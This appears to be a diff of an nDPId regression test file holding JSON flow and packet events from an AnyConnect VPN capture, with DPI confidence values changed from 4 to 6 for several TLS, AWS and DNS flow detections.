00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569687246891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569687246891,"pkt":"LH6BsEqhNDY7z3UoCABFAAAzrdgAAP8Ra2cKAADjS0tMTPaDADUAH3AoGBgBAAABAAAAAAAABWxvY2FsAAAGAAE="} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 